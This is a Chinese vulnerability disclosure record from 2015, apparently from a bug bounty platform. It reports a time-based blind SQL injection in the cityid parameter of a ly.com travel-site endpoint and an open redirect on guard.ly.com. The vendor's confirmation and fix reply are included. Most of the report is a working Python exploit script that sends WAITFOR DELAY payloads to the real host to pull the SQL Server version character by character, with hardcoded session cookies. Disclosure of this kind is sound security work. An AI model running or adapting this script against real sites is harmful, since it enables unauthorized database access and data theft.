2015-02-03: 细节已通知厂商并且等待厂商处理中 2015-02-03: 厂商已经确认,细节仅向厂商公开 2015-02-13: 细节向核心白帽子及相关领域专家公开 2015-02-23: 细节向普通白帽子公开 2015-03-05: 细节向实习白帽子公开 2015-03-20: 细节向公众公开
同程网主站存在某处SQL盲注漏洞二
http://www.ly.com/dujia/AjaxCallNew.aspx?type=GetQianzhengSearch&iid=0.567149235517985&cityid=321的cityid参数存在SQL盲注。另外一个URL跳转漏洞:http://guard.ly.com/authcode.aspx?returnUrl=http%3a%2f%2fwww.baidu.com%2findex.php%3ftn%3dmonline_5_dg&ac=372259583
#-*-coding:utf-8-*-import httplibimport timeimport stringimport sysimport randomimport urllibheaders = { 'Cookie': 'Hm_lvt_ca5679d0986b1f42f800098b798c7008=1422580774; Hm_lvt_f97c1b2277f4163d4974e7b5c8aa1e96=1421055383,1421056354,1421135352,1421135572; Hm_lvt_66fe51fe80bbcaf2044aa51205d7d88d=1422581413; SearchNew=%25E5%25A4%25A7%25E7%2590%2586%2526%25E5%258C%2597%25E4%25BA%25AC%25262015-02-02%2526%2526%2526; __tctma=144323752.1420797897384185.1420797897683.1422580182505.1422588301145.7; MAIF=||; MAIH=24489,24489,24489,77415,77415,135,24489,24489,24489; searchHistory=%E5%8C%97%E4%BA%AC,53,0,2015-01-13,2015-01-14; ABTest_115=657#1#42952259; MAIQZ=131; MAIHL=201448,201448,70855; Hm_lvt_15ef3105c6a9f68cd7c3b8617aec2e46=1422588841; Hm_lvt_0f71f0877229e4e6503de92a28cbf166=1422589516', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',}payloads = list(string.ascii_lowercase)payloads += list(string.ascii_uppercase)for i in range(0,10): payloads.append(str(i))payloads += ['@','_', '.', '-', '\\', ' ']print 'Try to retrive SQL Server Version:'user = ''for i in range(1,30,1): for payload in payloads: timeout_count = 0 try: conn = httplib.HTTPConnection('www.ly.com', timeout=4) random.seed() #area = str(random.random()) + "fasfa'; if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- " % (i, ord(payload)) #print i #print ord(payload) #headers['Cookie'] = "area=" + urllib.quote(area) url="/dujia/AjaxCallNew.aspx?type=GetQianzhengSearch&iid=0.567149235517985&cityid=321"+"if%28ascii%28substring%28%40%40version%2c"+str(i)+"%2c1%29%29="+str(ord(payload))+"%29waitfor%20delay'0%3a0%3a5'" #print url #time.sleep(0.1) start_time = time.time() conn.request(method='GET', url=url, headers = headers) conn.getresponse() conn.close() print '.', time.sleep(1) #robots except Exception as e: #print e timeout_count += 1 if(timeout_count==1): user += payload print '[In Progress]', user breakprint '\n[Done], SQL Server version is', user
过滤参数
危害等级:高
漏洞Rank:16
确认时间:2015-02-03 12:27
感谢对同程旅游的关注,下午会安排修复。
暂无